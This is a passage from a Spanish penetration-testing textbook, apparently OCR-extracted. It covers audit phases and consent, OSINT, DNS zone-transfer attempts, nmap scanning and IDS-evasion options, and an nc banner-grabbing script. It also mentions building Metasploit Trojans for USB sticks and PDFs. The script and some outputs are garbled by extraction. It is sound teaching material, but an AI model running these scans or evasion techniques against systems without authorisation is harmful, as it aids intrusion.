Y Posible 

VF Improbable, pero técnicamente posible 
Y Imposible 


Si alguno de los afectos por la actividad auditora se niega a firmar el 
consentimiento informado, debemos hablar con su jefe directo. La persona que se ha 
recusado dará sus razonamientos al jefe directo, y nosotros los nuestros. Esto puede 
dar lugar a situaciones incómodas y que nos veamos inmersos en la política de pasillo 
del cliente; pero no debemos proceder sin las autorizaciones apropiadas. En caso de 
que alguna no sea posible conseguirla, debemos notificárselo a la propiedad, decir 
qué pruebas concretas no podemos hacer por carecer de autorización, y que sea la 
propiedad quien determine si sustituye a la persona durante el tiempo que se procede 
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а la prueba, no se realiza esa prueba concreta, u otra persona asume la autorización y 
firma el consentimiento informado —lo que en algunos casos es legalmente posible, 
pero si se trata de derechos personales, no lo va ser. Cuando tengamos todos los 
consentimientos informados, pasamos a la siguiente fase. Si no disponemos de ellos, 
puede que incluso tengamos que redisenar los tests de intrusión, y que eso pueda 
afectar incluso al presupuesto. 


2.5 TERCERA FASE: VALIDACIÓN LEGAL Y DE PERMISOS DEL ALCANCE Y 
CONDICIONES DEL TEST DE INTRUSION 


Con toda la documentación que hemos recopilado, debemos decidir antes de 
hacer nada si es legal lo que vamos a hacer, o no. 


De entrada, es ilegal atacar sistemas de terceros que no nos hayan firmado 
el consentimiento informado, utilizar cuentas de personas que no nos hayan 
firmado el consentimiento informado. Por regla general, no podemos interceptar 
comunicaciones, no podemos leer correos electrónicos en los que no somos ni 
remitente, ni destinatario. No podemos robar, ni hurtar, ni apropiarnos temporalmente 
de forma indebida objetos personales a empleados. No podemos registrar sus 
taquillas, ni por las "buenas" -con copia de llave- ni por las “malas” -con ganzúa, 
llave de bumping, o radiografía-. 


Si una acción es ilegal, es frecuente que pueda ser "legalizada" con el 
consentimiento informado de la persona o el ente que la va a sufrir. Si no es posible 
o conveniente el avisar u obtener el susodicho consentimiento informado, podemos 
solo analizar desde el punto de vista teórico la factibilidad de la acción, obteniendo 
pruebas de que es factible realizarla y de cual sería el resultado de la ejecución. O 
podemos redefinir el alcance del trabajo, lo que puede suponer también cambios en 
el presupuesto. 


2.6 CUARTA FASE: RECOLECCIÓN DE INFORMACIÓN 


Las fases anteriores han sido poco técnicas. Esta será la primera de las tres 
fases puramente técnicas. 


La recogida de información pasa por emplear determinadas técnicas -tales 
como el footprinting o el fingerprinting- con objeto de conocer información interna 
de sistemas respecto a los servidores o el software cuya seguridad se va a auditar. La 
ingeniería social también es una técnica muy utilizada en esta fase, ya que permite 
obtener mucha información con poco esfuerzo. 
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Esta fase siempre la debemos encarar con un doble objetivo: por un lado, 
ver cuanta información podría conseguir un atacante externo. Nosotros, como 
auditores, en principio podemos descolgar el teléfono, llamar, y obtener determinada 
información sin esfuerzo; pero, ¿Cuanta de esa información puede ser obtenida por 
un atacante que no tenga esa posibilidad? Esta información es muy importante, ya 
que una de las mejoras que deberemos proponer será evitar el filtrado de información 
táctica que permita al atacante ser más efectivo. 


E] segundo objetivo es obtener información real, práctica, de determinados 
puntos que realmente no están en la información que nos pasan, y que los empleados 
de sistemas pueden habernos ocultado. Son aspectos que en principio puede no 
conocer nadie, y que sistemas los mantiene de forma extraoficial para solucionar 
problemas puntuales desde su casa sin ir a la oficina, o para callar a ese directivo 
que está constantemente molestando. No sería la primera empresa que tiene una 
wifi "extraoficial", con restricciones de seguridad nulas, para que un directivo 
pueda enchufar su portátil o su tablet personales a la intranet de la empresa sin dar 
demasiadas explicaciones. Se ve de todo, y en la fase de recolección de información 
tendremos que buscar todo aquello que no está “oficialmente” en los informes. 
Hablaremos con más detalle de esta fase, más adelante, en nuestro libro. 


2.1 QUINTA FASE: ANÁLISIS DE LAS VULNERABILIDADES 


A partir de la información recolectada, debemos ir elemento a elemento 
analizando si presentan vulnerabilidades conocidas, o incluso posibles vulneraciones 
potenciales. En esta fase plantearemos las estrategias de ataque, qué vulnerabilidades 
documentaremos pero no llegaremos a explotar, cuales bastará con una prueba de 
concepto, y cuales tendremos que explotar. 


En el caso de empresas que lo tienen todo realmente como en las primeras 
fases nos aseguraron que nos lo encontraríamos, pasaremos a la siguiente fase sin 
más problema. Sin embargo, en empresas en las que encontremos aspectos críticos 
ocultos "debajo de la alfombra", es probable que tengamos que avisar a la propiedad, 
ya que descubramos nuevas pruebas que practicar. Por ejemplo, si encontramos una 
wifi no documentada y con un sistema de cifrado y autentificación débil, no debemos 
suponer que tenemos una autorización genérica para "romperla" y acceder a ella. 
Debemos notificárselo a la propiedad, y recabar el permiso para poder realizar la 
explotación de las vulnerabilidades que tenga, si procede explotarla. Finalmente, 
es probable que nos veamos que debemos hacer ampliaciones de presupuesto si el 
cliente estima que son necesarios análisis adicionales. 
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2.8 SEXTA FASE: EXPLOTACIÓN DE LAS VULNERABILIDADES 


Esta fase es la que excita más al inconsciente y que no tiene experiencia, 
no entiende las connotaciones legales de lo que hace, o ambas cosas. También es la 
fase que preocupa más al auditor de seguridad experimentado; ya que tiene serias 
connotaciones legales, y siempre puede salir muy mal. 


Antes de entrar en esta fase, debemos hacer un inciso: en muchos escenarios, 
bastará con que digamos que existe una vulnerabilidad y la documentemos: no hace 
falta que la explotemos. 


A veces, basta con una prueba de concepto. Cuando hacemos una explotación 
de una vulnerabilidad como prueba de concepto, el objetivo es demostrar que 
la explotación de la vulnerabilidad es posible, no utilizarla para hacer algo. Nos 
encontraremos en este escenario cuando nos enfrentamos a un personal técnico que 
directamente nos afirma que es imposible, y una propiedad que nos plantea validar si 
lo es. El objetivo, por lo tanto, no es entrar. Y mucho menos, entrar y “hacer daño”. 
El objetivo en este escenario solo es mostrar que es técnicamente posible la entrada 
y documentar cómo se ha hecho. 


Es especialmente comun el uso de pruebas de concepto cuando la 
vulnerabilidad la tiene una base de datos en producción, un ERP en producción, o 
por regla general supone un ataque por denegación de servicio, parón de sistemas 
productivos, o alteración o pérdida de los datos de la empresa. No hay que realizar el 
dano, basta con demostrar que es posible realizarlo. 


A veces, sin embargo, es más adecuado -siempre con la autorización 
del cliente- realizar la explotación de las vulnerabilidades. Hay determinadas 
vulnerabilidades que habitualmente es mejor explotarlas. Es el caso de los sistemas 
de seguridad perimetral, las redes wifi, pinear NATS y firewalls, o las inyecciones 
SQL, por poner algunos ejemplos. Hay dos razones por las que habitualmente 
estas vulnerabilidades es más conveniente explotarlas: se trata de técnicas que son 
imprescindible poder explotarlas para poder, a partir de ellas, "saltar" a los sistemas 
internos de una empresa; y permiten atacar a máquinas que no están aparentemente 
en primera línea. La segunda razón es también de mucho peso: son técnicas que se 
pueden realizar de forma inocua, sin generar danos en los sistemas de información 
de la empresa ni paradas de servicio. 


Hablaremos de estas técnicas más adelante en este libro. 
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2.9 SÉPTIMA FASE: REDACCIÓN DE INFORME DE AUDITORÍA Y PRESENTACIÓN 
DE RESULTADOS A LA PROPIEDAD 


Esta es, sin lugar a dudas, la fase más importante -y con mucha diferencia- de 
los tests de intrusión. Si no somos capaces de transmitir al cliente los descubrimientos 
encontrados, y que el cliente lo entienda y tome acción que solucione el problema, 
nuestro trabajo habrá sido completamente inütil. 


Redactar informes de auditoría requiere escribir bien, expresarse 
adecuadamente, y saber modular el lenguaje; para ser lo suficientemente técnico 
como para ser preciso, pero lo suficientemente no técnico para que el cliente entienda 
de qué le estamos hablando sin tener formación específica en ingeniería informática. 
Emplearemos de forma generosa símiles del mundo físico, que permitan al lector de 
nuestro informe entender qué queremos decir exactamente. 


Presentar un informe de auditoría requiere saber hablar en püblico, saber 
transmitir, saber conectar con la gente. Requiere tener aplomo y cuajo para presentar 
cosas que pueden ser desagradables para un püblico que puede ser hostil. Requiere 
saber asumir críticas, y requiere rapidez de reflejos y flexibilidad mental para poder 
debatir y rebatir argumentaciones en caliente. Requiere autocontrol y mesura, para 
no "perder los papeles" ante un director de sistemas preocupado en desacreditarnos 
y que irá con "artillería" a la reunión. 


No entraremos en más detalle en este aspecto: en parte, porque la redacción 
de informes de auditoría correspondería a un libro sobre auditoría informática; 
cuando se judicializa, sobre informes periciales. En parte porque existen multitud de 
cursos para escribir bien y hablar bien en püblico que, sin que necesariamente traten 
de las auditorías de seguridad, lo aprendido en ellos es completamente transferible 
al ejercicio de esta profesión. Participar en grupos como Toastmasters -que tiene 
clubs por toda Е$райа- o en grupos de teatro puede ser de gran ayuda para aprender 
a hablar bien en publico, perder el miedo escénico y vocalizar correctamente. 


2.10 OCTAVA FASE: PRESENTACION DE RESULTADOS AL PERSONAL TECNICO Y 
FORMACION 


Destacamos como hemos segregado la presentación de resultados a la 
propiedad de la presentación de resultados al personal técnico. Esta presentación 
consideramos que se debe plantear y hacer por separado; y la presentación por 
separado obedece a razones de comunicación -el personal técnico "habla" un 
"idioma" distinto, y nos tenemos que adecuar a la terminología del püblico-, razones 
de mecánica de la reunión -el personal técnico puede intentar "sabotear" la reunión 
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con la propiedad entrando en discusiones estériles de forma constante, ya que tendrá 
la sensación de que se les está criticando a ellos, y tenderán a defenderse. 


Normalmente a esta fase se le da un enfoque más formativo que presentativo. 
Mientras que en la fase anterior se planteaba hacer una presentación en lenguaje 
llano de los problemas encontrados, en esta fase se busca que el personal técnico 
entienda dónde está el problema con lo que está haciendo, y aprenda a solucionar el 
problema y buenas prácticas para que no ocurra de nuevo. 


Tampoco entraremos en más detalle en esta fase; ya que los elementos a 
desarrollar son andlogos a los de la fase anterior -cómo presentar y ensenar de forma 
eficiente—, y están fuera del alcance de este libro. 





RECOGIDA DE INFORMACIÓN INICIAL 
CON KALI 


El primer paso de una intrusión es siempre recoger información inicial. Esta 
recogida de información se denomina en el mundo anglosajón footprinting, y hay 
libros enteros sobre técnicas para realizarla. 


La primera recogida de información es la externa -también denominada 
external footprinting-, que se realiza sin acceso a los sistemas de la empresa. 
Esta fase involucra analizar servidores en la zona desmilitarizada; pero también 
involucra ingeniería social. A través de ingeniería social podemos descubrir qué 
tipos de bases de datos utilizan, qué lenguajes utilizan en sus sistemas internos y qué 
sistemas operativos utilizan —por ejemplo, a través de los perfiles de LinkedIn de 
administradores de sistemas y de programadores; así como a través de las ofertas de 
empleo antiguas en cualquier portal de empleo-. También el tamano de la red, y el 
seccionado. Algunos aspectos los tendremos que realizar mediante técnicas híbridas: 
una primera parte de ingeniería social, que nos permita entrar en la empresa para 
identificar los puntos físicos de red desatendidos, o que nos permita realizar un 
escaneo de redes a una distancia suficiente de los AP como para poder identificar 
las redes existentes; y una segunda parte de la técnica, para mapear en sí la red o 
escanear las redes wifi disponibles, y romper las que sea posible. A veces se utilizan 
troyanos para tablet o móviles, que se pueden hacer con Metasploit o bien a través 
de aplicaciones, o bien en PDF o en flash. También se pueden hacer troyanos en USB 
con Metasploit, y encontrar alguna excusa para que algün incauto enchufe el llavero 
USB infectado en la red interna de la empresa. 
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La segunda recogida de información es la interna -también denominada 
internal footprinting-. Una vez que ya tenemos un acceso aunque sea mínimo 
más allá de la zona desmilitarizada, tendremos que recabar información sobre los 
sistemas que encontremos. Esta etapa se centrará en evitar "levantar la liebre" y 
ser detectados; y la "estrella" de los ataques serán los ordenadores portátiles y de 
sobremesa en un primer lugar, utilizando Metasploit. Después se suele ir a por la 
lógica de red o a por los servidores, intentando en estos ültimos diversas técnicas de 
escalado hasta conseguir los privilegios deseados. 


3.1 RECOGIDA DE INFORMACIÓN A TRAVÉS DE OSI 


Gran parte de la recogida de información externa, y lo que supone el 
comienzo del proceso de pentesting, se realiza mediante lo que se denominan 
técnicas OSINT -acrónimo de Open Source Intelligence, o "inteligencia de fuentes 
abiertas"-. Con frecuencia, también encontraremos el uso de OSI por OSINT 
referido al uso de fuentes abiertas para recabar información. Es importante que 
entendamos que el OSI/OSINT no tiene absolutamente nada que ver con el Open 
Source referido a "Software de fuentes abiertas" dentro de la terminología del 
Software Libre. 


Ya el análisis de las técnicas OSI para obtener información de la empresa 
auditada da material para un libro exclusivo de técnicas OSI, y que además se escapa 
de los objetivos de nuestro libro. Las técnicas OSI de mayor uso es la busqueda por 
Internet de información de los sistemas de información de la empresa; especialmente 
a través de los perfiles de LinkedIn de trabajadores o de antiguos trabajadores, así 
como de las tecnologías requeridas en las ofertas de empleo de las empresas, sean 
pasadas o presentes. 


La recogida de información vía OSI siempre debe preceder al uso de 
herramientas; ya que nos permitirá hacer la elección correcta de las herramientas 
adecuadas, así como evitar ser demasiado intrusivo y avisar a los sistemas de 
detección de intrusos de la empresa mediante un escaneo indiscriminado. 


Existen herramientas en Kali que ayudan a realizar este proceso organizando 
la información, tales como el Maltego: 


ER 
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'* Maltego Kali Linux + jue 11:22 


Maltego Kali Linux Edition 4.0,11 





k And in Entity 
Ries Selecton 


гат Maltego Conferet 
Trainings 


б PATERVA CTAS From Transform Hob 


black hat Standard Paterva CE Transforms 


Las Vegas, USA 
July 22-25 CaseFile Entities 
eur 


Additional entities from CaseFi 


Andrew MacPherson (Paterva) 
Query Shodan data from within Maltega! 


FREE 


SensePost Toolset from Tanelin dal 
SensePost 

A set of various transforms - with regular updat.. 
FREE 

Kaspersky Lab 


Kaspersky Lab 
Query Kaspersky Threat Intelligence Date Feeds 





Maltego tiene add-ons y scripts que permiten realizar algunas de las tareas 
de recogida de información no-OSI de forma semiautomatizada. De cualquier 
forma, estas posibilidades también están incorporadas en Metasploit, y además 
es interesante que aprendamos cómo se hacen estas operaciones, por lo que ahora 
pasaremos a analizar la recogida de información a través de técnicas manuales. 


3.2 RECOGIDA DE INFORMACIÓN A TRAVÉS DEL DNS 


Después de la recogida de información vía OSI, el siguiente paso será el 
análisis de DNS. El análisis de DNS es muy interesante porque da mucha información 
de sistemas que están en la zona desmilitarizada de la red de la empresa sin dejar 
ningun rastro detectable por un IDS -Sistema de Detección de Intrusos- aunque la 
empresa tenga configurado el DNS en modo paranoico. 
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Para ello, lo primero que debemos hacer es obtener una transferencia de 
zona. Esto lo haremos con la utilidad de línea de comandos dnsenum, que tiene como 
sintaxis: 


dnsenum nombrededominio 


Donde nombrededominio corresponde con el dominio de la empresa 
que estamos auditando. Por ejemplo, podemos obtener información del dominio 
orcero.org haciendo: 


dnsenum orcero.org 


Y obtenemos algo como: 


root@kali: ~ 


Archivo Editar Ver Buscar Terminal Ayuda 
:-# dnsenum peritoeninformatica 
dnsenum.pl VERSION: 1.2.3 


peritoeninformatica.pro 


peritoeninformatica.pro. l 51.255.161.39 


ns107.ovh.net. 257 N 251.128.151 
dns197.ovh.net 37 N 251.188.151 


www.peritoeninformatica.pro. ^ \ 51.255.161.30 


ovh.net ... 
AXFR record qu 


Trying Zone Transfer for peritoeninformatica.pro on dns107.ovh.net 
AXFR record query failed: REFUSED 


brute force file not specified, bay. 
"im. i 





El dnsenum que acompanaba Kali hasta la 2016.2 tenia un error; en la fase 
de transferencia de zona, aborta con el primer servidor DNS que no le deja hacerlo. 
Podemos solucionar este problema o especificando con -threads un nümero de 
hebras concurrentes que sea superior al numero de servidores DNS del dominio, o 
utilizando la versión 1.2.4, que podemos descargar de: 
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https://raw.githubusercontent.com/fwaeytens/dnsenum/master /dnsenum.pl 


Esto es un error que se ha comenzado a dar en las fechas en las que escribo 
esta documentación, por lo que es probable que en poco tiempo Kali actualice a la 
1.2.4. La salida de la 1.2.4 es, por ejemplo: 


root@paladio:/tmp# dnsenum.pl orcero.org 
dnsenum.pl VERSION:1.2.4 
orcero.org 


Host's addresses: 


Name Servers: 


ns3.zoneedit.com. 128.199.65.59 
nsl.zoneedit.com. 162.220.33.236 


Mail (MX) Servers: 


delfos.orcero.org. 299 www.orcero.org. 
www.orcero.org. 299 A 188.165.231.195 


Trying Zone Transfers and getting Bind Versions: 





Trying Zone Transfer for orcero.org on ns3.zoneedit.com ... 
AXFR record query failed: Response code from server: NOTAUTH 


Trying Zone Transfer for orcero.org on nsl.zoneedit.com ... 
AXFR record query failed: Response code from server: REFUSED 


brute force file not specified, bay. 
root@paladio:/tmp# J 





Kali 2017.1 sigue trabajando con la versión 1.2.3; pero el error está 
parcheado y dnsenum funciona correctamente. 


Podemos especificar un diccionario para que pruebe subdominios a través 
de fuerza bruta. Nos quedamos, sin embargo, con este uso básico; para buscar 
subdominios, es mejor utilizar la herramienta dnsmap. 
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Llegados a este punto, lo que nos interesa encontrar son las IP de las 
máquinas del dominio, y para qué sirven. Nos interesan las entradas A, que 
corresponden a máquinas con IP püblica, que será la primera puerta de ataque. 
También los servidores de nombre, y los servidores de correo MX. Es interesante 
también no solo lo que está, sino lo que no está: si vemos que hay "saltos" entre 
IP consecutivas, eso puede significar que esos saltos corresponden a IP reservadas 
pero que no tienen servidor asociado. Pero ojo: también pueden ser IP de servidores 
de pruebas en zona desmilitarizada, que suelen ser muy vulnerables, o de lógica 
de red, que también tiene mucho interés. Los registros SPF también son muy 
interesantes; ya que pueden mostrar IP püblicas activas y que no tienen resolución 
directa. Finalmente, los registros HINFO en principio contienen información sobre 
el sistema operativo de las máquinas. Pero es información puesta a mano por el 
administrador del dominio, por lo que en principio no nos podemos fiar mucho 


de ella. 


El siguiente paso que debemos seguir es localizar los subdominios; lo 
que si el dominio analizado permite transferencia de dominios será trivial -ya que 
obtendremos los subdominios-. Si no, tendremos que probarlo vía ingeniería social 
o vía técnicas OSI. Podemos mediante uno de los métodos anteriores encontrar 
candidatos a subdominio, y alimentar a dnsenum con nuestras suposiciones. 
Finalmente, podemos buscar subdominios por fuerza bruta, mediante el uso del 
comando: 


dnsmap dominio 


Es importante que recordemos que este comando puede hacer “saltar la 
liebre” si tienen un IDS muy bien afinado; y que, como es de fuerza bruta, puede 
tardar bastante en encontrar subdominios. Por ello, lo podemos interpretar como una 
última opción. 


Otro comando interesante es el dnsrecon, que tiene la sintaxis general para 
analizar un dominio: 


dnsrecon -d dominio 


Por ejemplo, para analizar el dominio peritoeninformatica.pro, hacemos: 


dnsrecon -d peritoeninformatica.pro 


Y obtenemos algo como: 
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-& dnsrecon -d peritoeninformatica.pro 

Performing General Enum ain: peritoeninformatica.pro 
DNSSEC is not gur Р informatica.pro 

50А dns10 = ; 51 

NS dns107 5 51 

Bind Version for 1.188.151 [Secured] 

NS dns107.0vh.net 41d0:1:4a97::1 

NS ns107.ovh.net 213.251.128.151 


ovh.net 2001:41d0:1:1997::1 
MX www.peritoeninformatica.pro 51.255.161.39 
rmatica.pro 51.255.161.39 
formatica.pro 1|ww.peritoeninformatica.pro 
XT peritoeninformatica.pro v=spfl mx a:www.perltoeninformatica.pro 1p4:51.255.161.39/32 -all 
Enumerating SRV Records 
No SRV Records Found for peritoeninformatica.pro 
0 Records Found 
:-# 





Tanto la identificación de nodos vivos como el еѕсапео de puertos se hacen 
con la utilidad nmap. Es una utilidad fundamental, cuyo uso debemos dominar. Lo 
que vamos a ver en este libro es solo un pequeno porcentaje de lo que se puede hacer 
con esta herramienta. 


El primer paso que debemos dar si queremos auditar la seguridad de una 
red es identificar dentro de una red que nodos están vivos. Esto lo podemos hacer 
mediante la opción de sondeo -sP; con la sintaxis: 


nmap tipobarrido opciónsondeo red 


Donde red corresponde con la red que vamos a escanear. Por ejemplo, 
escanear la clase C dentro de 192.168.2.x sería 192.168.2.0/24. La nomenclatura es 
la normal dentro del mundo de las redes: la IP base, y el numero de bits dentro de la 
IP base que debe coincidir en las IP analizadas, comenzando por la más significativa. 
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Por otro lado, tipodebarrido corresponde al tipo de barrido para descubrir 
sistemas, que puede ser: 


V -PB: La opción por defecto si utilizamos -sP. Intenta primero ICMP. Si no 
responde, intenta abrir los puertos 80 y 445. Es antiintuitivo el nombre. 


V -P0: Realiza barrido de puertos, pero no hace sondeo con ping. 


V -PSlistapuertos: Analiza los puertos TCP listados en listapuertos mediante 
barrido con TCP SYN. 


Y -PAlistapuertos: Analiza los puertos TCP listados en listapuertos mediante 
barrido con TCP ACK. 


Y -PUlistapuertos: Analiza los puertos UDP listados en listapuertos. 


Y -PE: Ping ICMP. Hay tres posibilidades de hacer este ping, algunas -o 
todas- pueden estar filtradas por la seguridad de host o por firewalls 
intermedios. 


Y -PP: Ping ICMP. Hay tres posibilidades de hacer este ping, algunas 
—o todas- pueden estar filtradas por la seguridad de host o por firewalls 
intermedios. 


Y -PM: Ping ICMP. Hay tres posibilidades de hacer este ping, algunas -o 
todas— pueden estar filtradas por la seguridad de host o por firewalls 
intermedios. 


V -PA: Sondea generando directamente las solicitudes ARP. Esto acelera y 
dificulta la detección del barrido en redes Ethernet. 


Podemos poner tantos tipos de barridos como queramos. Es importante 
que tengamos en cuenta que TCP SYN y TCP ACK nos dicen solo que hay algo 
escuchando -y que, con ello, la máquina está "viva"-. El puerto puede estar cerrado. 
Todas estas opciones son para detectar máquinas vivas a través de cómo se comportan, 
no detectar qué puertos están abiertos. 


Por otro lado, opciónsondeo corresponde con el tipo de sondeo que vamos a 
hacer sobre los nodos vivos que encontremos, y puede ser: 


V -sP. Barrido ping. Solo identifica las máquinas, no analiza puertos. 


Y -sT: Sondeo TCP connect. Funciona abriendo puertos. Puede dejar 
rastros en los históricos, y lo detectan hasta los IDS más rudimentarios. 
No atraviesa firewalls bien configurados. 
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V -sS: Esel sondeo más rápido si queremos escanear a mucha velocidad una 
red grande. Funciona contra cualquier pila TC y no da falsos positivos. 
Consiste en mandar un paquete SYN para comenzar a abrir una conexión 
TCP, pero no llega a abrirla, ya que no completa el escenario. Lo puede 
detectar un IDS bien configurado. 


Y -sU: Sondeo de UDP. Es muy lento. 
Y -sO: Sondeo de protocolo IP. Es muy lento. 


Y -sN: Sondeo TCP NULL. Aprovecha una indefinición de la КЕС de TCP. 
Puede ser detectado por un IDS muy bien configurado, pero no es comün. 
Suele pasar a través de los firewalls. 


Y -sF: Sondeo TCP FIN. Aprovecha una indefinición de la RFC de TCP. 
Puede ser detectado por un IDS muy bien configurado, pero no es comün. 
Suele pasar a través de los firewalls. 


Y -sX: Sondeo Xmas. Aprovecha una indefinición de la КЕС de TCP. Puede 
ser detectado por un IDS muy bien configurado, pero no es común. Suele 
pasar a través de los firewalls. 


Y -sA: Sondeo TCP ACK. Se utiliza para analizar los cortafuegos. Permite 
identificar en un cortafuegos qué puertos se dejan pasar libres, qué 
puertos aplican reglas, qué puertos se filtran y en cuáles hay inspección 
de estados. 


Y -sW: Sondeo de ventana TCP. Se utiliza para analizar los cortafuegos. 
Permite identificar en un cortafuegos qué puertos se dejan pasar libres, 
qué puertos aplican reglas, qué puertos se filtran, y en cuales hay 
inspección de estados. 


Y -sM: Sondeo de TCP de Maimon. Es un sondeo tipo TCPACK, empleando 
la filosofía del Xmas. Se utiliza para analizar los cortafuegos. Permite 
identificar en un cortafuegos qué puertos se dejan pasar libres, qué 
puertos aplican reglas, qué puertos se filtran y en cugales hay inspección 
de estados. 


V -sI sistemazombi:puerto: sondeo a través de un sistema zombie, ya 
comprometido. Lo interesante de este sondeo es que las máquinas entre el 
zombi y la máquina analizada, máquina analizada incluida, creen que el 
paquete sale del zombie; por lo que podemos emplearlo para indentificar 
reglas en los firewalls intermedio y qué se puede hacer en la máquina 
analizada desde la máquina zombie. 
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Luego, tenemos modificadores que nos permiten ocultar nuestro rastro. 
Por ejemplo, si añadimos -f, se mandarán los paquetes fragmentados; por lo que 
le costará mucho más trabajo a los IDS y los firewalls detectar el barrido. Por otro 
lado, tenemos mecanismos para asegurarnos que no dejemos detrás ningün nodo sin 
detectar. Si hacemos algo como: 


nmap -PE -PP -PS80,443 -PA3389 -PU40125 red 


Por ejemplo, para asegurarnos que identificamos todos los nodos “vivos” en 
el rango entre la 192.168.2.0 y la 192.168.2.255, hacemos: 


nmap -PE -PP -PS80,443 -PA3389 -PU40125 192.168.2.0/24 


Obtendríamos varias pantallas de máquinas detectadas con sus puertos; la 
ültima página sería: 
23/tcp open telnet 


B8/tcp open http 
AC Address: F8: m 67:CA:66:07 (Unknown) 


map scan report for 192.168.2.2 

ost is up (0.0015s latency). 

ot shown: 999 closed ports 

PORT STATE SERVICE 

80/tcp open http 

AC Address: 48:58:39:1A:FB:8E (Asustek Computer) 


map scan report for almacen.trantor (192.168.2.20) 
ost is up (0.000096s latency). 
ot shown: 992 closed ports 
P STATE SERVICE 
open ssh 
open smtp 
open http 
open rpcbind 
open netbios-ssn 
open microsoft-ds 


open submission 
D049/tcp open nfs 
AC Address: 00:22:4D:A4:22:6F (Mitac International) 


map scan report for 192.168.2.111 
ost is up (0.0000020s latency). 
ot shown: 996 closed ports 
P STATE SERVICE 

open ssh 

open smtp 

open http 

open rpcbind 


map scan report for 192.168.2.114 

ost is up (0.00049s latency). 

ot shown: 998 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

111/їср open rpcbind 

AC Address: C0:7C:D1:C0:0E:20 (Unknown) 


map scan report for 192,168,2,246 

ost is up (0.014s latency). 

All 1000 scanned ports on 192,168,2,246 are closed 
AC Address: 30:D6:C9:0E:17:21 (Unknown) 





map done: 256 IP addresses (8 hosts up) scanned in 9.21 seconds 
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Observamos que, entre otras cosas, nmap nos da la MAC de la máquina 
identificada si estamos en la misma red Ethernet. Esto será muy ütil cuando ya 
estemos en la red interna del cliente auditado. 


Otro ejemplo de uso de nmap es el análisis de paquetes IP. Por ejemplo, 
haciendo: 


nmap -sO almacen 


Obtendremos algo como: 


Starting Nmap 6.00 ( http://nmap.org ) at 2016-04-20 18:06 CEST 
arning: 192.168.2.20 giving up on port because retransmission cap hit (10) 
Nmap scan report for almacen (192.168.2.20) 
Host is up (0.00019s latency). 
rDNS record for 192.168.2.20: almacen.trantor 
Not shown: 250 closed protocols 
PROTOCOL STATE SERVICE 
1 


ореп 1стр 
open|filtered igmp 
open tcp 
open udp 
open|filtered pim 
open|filtered udplite 
MAC Address: 00:22:4D:A4:22:6F (Mitac International) 





done: 1 IP address (1 host up) scanned in 279.89 seconds 


Un paso más a la hora de escanear puertos es obtener los banners de cabecera 
de los protocolos involucrados. Esto lo podemos hacer una vez que tenemos el listado 
de puertos abiertos obtenidos con el nmap, con el programa: 


Zl/bin/bash 

s Pon aqui los puertos abiertos 
PUERTOS="22 23 25 80 443 445" 

Pon aqui la IP 
IPDESTINO-"188.165.231.195" 

Iteramos para todos los puertos for i in 
$PUERTOS 

do 

#Volcamos donde operamos 

echo srv: $IPDESTINO puerto: $i $i 
#Utilizamos nc para obtener el banner echo 
[nc -v -n -w1 $IPDESTINO $i 

#Imprimimos un separador 

ео ә + д 
done 
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— 


Por ejemplo, hacemos un nmap al host www.orcero.org: 


nmap www.orcero.org 


Obteniendo: 


Starting Nmap 6.00 ( http://nmap.org ) at 2016-04-19 20:26 
CEST 

Nmap scan report for www.orcero.org (188.165.231.195) 

Host is up (0.076s latency). 

rDNS record for 188.165.231.195: servidor 

Not shown: 994 closed ports 

PORT STATE SERVICE 

22/tcp filtered ssh 

23/tcp open telnet 

25/tcp open smtp 

80/tcp open http 

443/tcp open https 

445/tcp filtered microsoft-ds 


Ahora pasamos el programa anterior: 


[sbin/banners 


Y obtenemos: 


srv: 188.165.231.195 puerto: 22 

(UNKNOWN) [188.165.231.195] 22 (ssh) : Connection timed out 
e srv: 188.165.231.195 
puerto: 23 

(UNKNOWN) [188.165.231.195] 23 (telnet) open SSH- 
2.0-OpenSSH_6.0p1 Debian-4+deb7u4 Protocol 
mismatch. 

srv: 188.165.231.195 puerto: 25 

(UNKNOWN) [188.165.231.195] 25 (smtp) open 

554 www.orcero.org ESMTP not accepting messages 
500 5.5.1 Command unrecognized: "" 

srv: 188.165.231.195 puerto: 80 

(UNKNOWN) [188.165.231.195] 80 (http) open 

srv: 188.165.231.195 puerto: 443 

(UNKNOWN) [188.165.231.195] 443 (https) open 

srv: 188.165.231.195 puerto: 445 

(UNKNOWN) [188.165.231.195] 445 (microsoft-ds) : 
Connection timed out 


© КА-МА Capítulo 3. RECOGIDA DE INFORMACIÓN INICIAL CON KALI 81 


Por lo que un análisis de banners es algo tan sencillo como esto: 


irbis@paladio:~$ nmap www.orcero.org 


Starting Nmap 6.00 ( http://nmap.org ) at 2016-04-19 20:26 CEST 
Nmap scan report for www.orcero.org (188,165,231.195) 
Host is up (0.076s latency). 
rDNS record for 188.165.231.195: servidor 
Not shown: 994 closed ports 

STATE SERVICE 

filtered ssh 

open telnet 

open smtp 

open http 

open https 

filtered microsoft-ds 


Nmap done: 1 IP address (1 host up) scanned in 6.17 seconds 
irbis@paladio:~$ /sbin/banners 
srv: 188.165.231.195 puerto: 22 
(UNKNOWN) [188.165.231.195] 22 (ssh) : Connection timed out 


srv: 188.165.231.195 puerto: 23 

(UNKNOWN) [188.165.231.195] 23 (telnet) open 
SSH-2.0-OpenSSH 6.0p1 Debian-4+deb7u4 
Protocol mismatch. 


srv: 188.165.231.195 puerto: 25 

(UNKNOWN) [188.165.231.195] 25 (smtp) open 

554 www.orcero.org ESMTP not accepting messages 
500 5.5.1 Command unrecognized: "" 


srv: 188.165.231.195 puerto: 80 
(UNKNOWN) [188,165,231,195] 80 (http) open 


srv: 188.165.231.195 puerto: 443 
(UNKNOWN) [188.165.231.195] 443 (https) open 


srv: 188.165.231.195 puerto: 445 
(UNKNOWN) [188.165.231.195] 445 (microsoft-ds) : Connection timed out 


irbis@paladio:~s @ 





Es decir, que se trata de una máquina con Linux y Debian. 


El tipo de máquina de la que se trata también se puede reconocer mediante 
nmap. Ello se hace lanzándolo con la sintaxis: 


nmap -O servidor 

Nos dirá qué sistema operativo utiliza ese servidor. Por ejemplo, si hacemos: 
nmap -O www.orcero.org 

Obtenemos: 


Starting Nmap 6.00 ( http://nmap.org ) at 2016-04-20 13:47 
CEST 
Nmap scan report for www.orcero.org (188.165.231.195) 
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Host is up (0.074s latency). 

rDNS record for 188.165.231.195: servidor 
Not shown: 994 closed ports 

PORT STATE SERVICE 

22/tcp filtered ssh 


23/tcp Open telnet 
25/tcp open smtp 
80/tcp open htt 
443/tcp open https 


445/tcp filtered microsoft-ds 

Device type: general purpose 

